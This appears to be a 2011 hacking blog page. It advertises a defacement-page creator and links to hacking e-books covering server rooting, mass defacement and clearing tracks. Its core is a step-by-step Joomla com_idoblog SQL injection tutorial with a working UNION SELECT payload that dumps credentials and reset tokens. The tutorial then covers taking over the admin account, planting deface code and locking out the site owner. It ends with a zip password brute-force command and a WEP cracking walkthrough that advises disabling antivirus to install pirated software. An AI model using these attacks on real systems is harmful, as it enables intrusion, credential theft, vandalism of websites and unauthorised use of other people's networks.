content top

Monday, September 5, 2011

Advanced Deface Page Creator


Options:
- Choose Sitetitle
- Write down some texts
- Create an error
- Fade-in a picture
- Background music
- Javascript box
- Funny circle around the curser
- Choose textcolor
- Choose backgroundcolor
- Hide Sourcecode




http://www.digzip.com/files/BFEFY2CN/Advanced Deface Creator 1.0.html

E-Book: The Secret of Hacking | Learn Hacking

Hi friends I hope You all are fine, Now its very hard to learn hacking because of the facility provided of tools and so, they are not letting us to become an ethical hacker. To become an ethical hacker we need complete knowledge about hacking , So I am providing a e-book to learn complete hacking for free. Just read out whole post to know more....

Learn To Hack : The Secret of Hacking 1st Edition

Important Steps :-
  • First download this ebook from below
  • Now open the .rar file and click on certificate.pfx
  • Then it will ask for password
  • Enter the password :- mh2005
  • Now open the hacking e-book provided
What You Will Learn :-

1. INTRODUCTION TO REAL HACKING

2. ADVANCED MALWARE RESEARCH


3. WINDOWS HACKING


4. PASSWORD HACKING


5. EMAIL HACKING


6. WEB APPLICATION HACKING


7. WEBSITE DEFACEMENT AND DOMAIN HACKING


8. MISCELLANEOUS HACKING


9. MOBILE AND COMPUTER FORENSIC


10. VOIP AND WIRELESS HACKING


11. VULNERABILITY DISCOVERY AND PENETRATION TESTING


12. ADVANCE HACKING WITH METASPLOIT


13. FIREWALL, IDS AND HONEY POT HACKING.


14. SECURING SYSTEM

File Information :-

Name :- THE SECRET OF HACKING
Size :- 1.70 Mb
Download :- Click Here To download e-book on hacking

Enjoy The world of hacking and donot forget to comment..

E-Book: XSS Attack



PUBLISHED BY- Syngress Publishing, Inc. ISBN-10: 1-59749-154-3
ISBN-13: 978-1-59749-154-9

This book is all about XSS. It will cover these topics on XSS.


Cross-site Scripting Fundamentals.
The XSS Discovery Toolkit
XSS Theory
XSS Attack Methods
Advanced XSS Attack Vectors
XSS Exploited
Exploit Frameworks
XSS Worms
Preventing XSS Attacks

Download Here:
http://www.ziddu.com/downloadlink/13171894/Cross_Site_Scripting_Attacks_XSS_Exploits_and_Defense_tqw_darksiderg.pdf

E-Book: How to Root Server

http://i2.cdn.turner.com/cnn/2010/images/12/16/t1larg.hack.cnn.jpg

This small book is will explain
you how professional hackers got root on servers.
this book is for beginner.

Leassons Of Book

Lesson 1
- What is Root ?

Lesson 2- How can I get on the Root ?

Lesson 3- Local root and how to search for
him ?
Lesson 4- How connect the server ?

Lesson 5- How to get Root access ?

Lesson 6- What happen after the root ?

Lesson 7- The withdrawal of my domain ?

Lesson 8- How to do mass deface ?

Lesson 9- How to register the hacked
websites on Zoneh?

Lesson 10
- How to clear tracks from serve ?


Download Link - http://www.mediafire.com/?tzmsm3l5d7zj864

Ethical Hacking E-Books's Collection

Hacking Exposed
-: Hacking Exposed-5 :-
One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.
Download (Size :- 18.5 MB)



Internet DoS
-: Internet Denial Of Service :-
Internet Denial of Service sheds light on a complex and fascinating form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide. It tells the network administrator, corporate CTO, incident responder, and student how DDoS attacks are prepared and executed, how to think about DDoS, and how to arrange computer and network defenses. It also provides a suite of actions that can be taken before, during, and after an attack. Inside, you'll find comprehensive information on the each and every topic relating denial-of-service attacks.
Download (Size :- 2.04 MB)



Viruses for Dummies
-: Computer Viruses For Dummies :-
It offers real, practical solutions to help ordinary users keep viruses out of their e-mail in-boxes-and explains how to respond when one slips through-
* In 2003, there was a major virus attack almost every month, which cost businesses worldwide an estimated $55 billion and did untold damage to home computers.
* Explains what viruses are and how they work, profiles major anti-virus software packages, shows how to keep anti-virus software updated, and helps people adopt safer computer work habits.
* The book’s value price and compact size will make it irresistible to people who need to protect their home PC or network.
Download (Size :- 2.33 MB)



Hackin9
-: Hackin9 :-

This book will help you learn :-
* How to use Google to find sources of personal information and other confidential data.
* How to find information about vulnerable systems and Web services.
* How to locate publicly available network devices using Google.
Download (Size :- 1.78 MB)

How to Hack Joomla - NFN (Not for Noobs)

How to hack Joomla!
Level: NFN (Not For Noobs)

Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge

DISCLAIMER:
THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:
USE ANONYMOUS PROXY!!!

Introduction

Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!

I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!

Finding Exploit And Target

Those two steps could go in different order, depend what you find first target or exploit...

Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages

[Image: 001cv.png]

At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

[Image: 002rg.png]

==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users--

Exploit can be separated in two parts:

Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)

Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--
This part looking for username and password from jos_users table

Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally...

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have

[Image: 003bd.png]

Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data

Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

[Image: 004k.png]

username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...

The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request

[Image: 005hy.png]

Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

[Image: 006fj.png]

username: admin
activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

[Image: 007pa.png]

If you done everything ok, Rest your Password page will load. Enter your new password...

After that go to:
Code:
http://www.site.com/administrator/
Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

[Image: 008bo.png]

To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

[Image: 009kw.png]

How to Crack Password Protected ZIP Files

People using Zip to compress their files beside compression they are trying to lock their important data with password(s).
Now let suppose if you do this same thing with your important files and now you have forgotten password, now what to do now its time to crack it.
This article will teach you how to crack the password of Zip files.


For this purpose we will use Linux based operating system and a tool FCrackZip for this purpose, FCrackZip is a fast and free-ware tool and it is easy to use Zip cracker tool it is similar to fzc and zipcrack. It has been written in assembler and it uses brute force and dictionary based attack to crack or find-out the passwords.
By using a simple Linux terminal and command you can easily crack the Zip password, you can download FCrackZip from your software manager.

Use this command to get FCrackZip from terminal
$ sudo apt-get install fcrackzip

After installing this you have options to attack on your zip file, either choose brute force attack or dictionary attack.
Here is the simple usage example.
$ fcrackzip -v -b -p aaaaaa -u your_zip_file.zip





By looking the above picture you can easily see the brute force attack against a zip file that is password protected, it took around 30 minutes to find the password for this zip.

Hack any Password Protected WI-FI Network & Use Unlimited Internet

Today I’ll tell you how do you hack any password protected wi-fi network with “CommView For Wi-Fi” software.

First you have to know what is Wi-Fi and how dose it work?
"Wi-Fi" is a type of wireless networking protocol that allows devices to communicate without cords or cables.
1: Wi-fi uses antennas around which wi-fi "hotspots" are created. The hotspots are outlets equipped to receive the radiowaves that power wireless networking. Until recently, wi-fi has been confined to more than 10,000 hot-spots in cafes, bars and airport lounges. But various projects are under way to set up city-wide zones, where a series of antennas are installed in the streets, on lampposts or street signs. The hotspots around them together create a much wider area of coverage. Norwich has a mesh network which links each lamppost antenna to the next creating a seamless wi-fi hotspot around the centre of the city.
2: The source internet connection is provided by a PC or server to which the antennas are connected either wirelessly or via a cable.
3: Some mobile phones and personal digital assistants (PDA) now have wi-fi chips installed. With mobile phones, this means conventional networks can be bypassed and inexpensive long-distance calls made over the web (using Voice over Internet Protocol, VoIP).
4: Many laptops and handheld computers now come with built-in wi-fi connectivity; it is also possible to add wi-fi to your computer with a special card that plugs into a port on your laptop.

Some organizations provide it for free but maximums provide it for business purpose only. And you have to give a password to access this kind of network.


This software price is $1099. Don't worry, I'm giving you for FREE.
Download This Software from HERE.
Note: Please turn off your anti-virus program before you install this software, otherwise this software will not work properly. After completing installing process you can re-run your anti-virus program.

Now follow the Instructions bellow:

1. Install the software and drivers.
2. Click on ‘Rules’ tab and tick on ‘Enable advance rules’ option.
3. Type ‘a’ on Name box and Past this code on formula box “tods=1 and dmac=FF:FF:FF:FF:FF:FF” like picture bellow. Then click ‘add/edit’ button.
4. A window will appear like the picture bellow. Give a tick on ‘a’ .


5. Then go to ‘Settings’ and click ‘Option’

6. Go to ‘Memory Usage’ tab and set everything just like this picture & click ‘Ok’ (Restart may be required).


7. Check ‘D’ funnel and uncheck another two funnel from the right top of this window.


8. Click ‘Search’ button and find the network that you want to creak.


9. Then drag it on ‘Channel’ tab and click ‘Capture’ button.
10. Now which one is do not capturing anything give it to password protected network and connect it. When it will ask for password, give any as you wish.
11. It will show this massage “Connected with limited connectivity”.
(I have no Wi-Fi connections at this time. that is why, I can’t share some screenshots).
12. Click on main menu again and then click on ‘Packets’ Tab. If everything was all right, you will see some Couple of Packets.


13. Click right button on “ARP REQ” Packet and then > “Send Packet(s)” > Selected.


14. This menu will appear.
15. Now change all values just like this and click ‘Send’.
16. Go to ‘Rules’ Tab again and uncheck the Rules “a” .

17. Select first 20000 packets and save it. Make sure you are saving it as “dump cap” file in place of “ncf” file format. (I have no Wi-Fi connections this time, that is why I can’t share some screenshots).

18. Now download a zip folder named “Aircrack-NG” from HERE. And extract it.
19. Open ‘bin’ folder and run this file ‘aircrack-ng-GUI.exe’. Then go where you saved the packets, select all and click launch.
20. An ‘IV’ list will came. Select the network that you want to creak.
21. Click ‘Connect’. You will be connected with your desire network like a magic !
22. Enjoy the Unlimited Wi-Fi Internet.

Also you can do with this software :


You can find more tutorials on about this software on the help menu of this software.

If you have any suggestion or comment please feel free to post it on the box bellow !

content top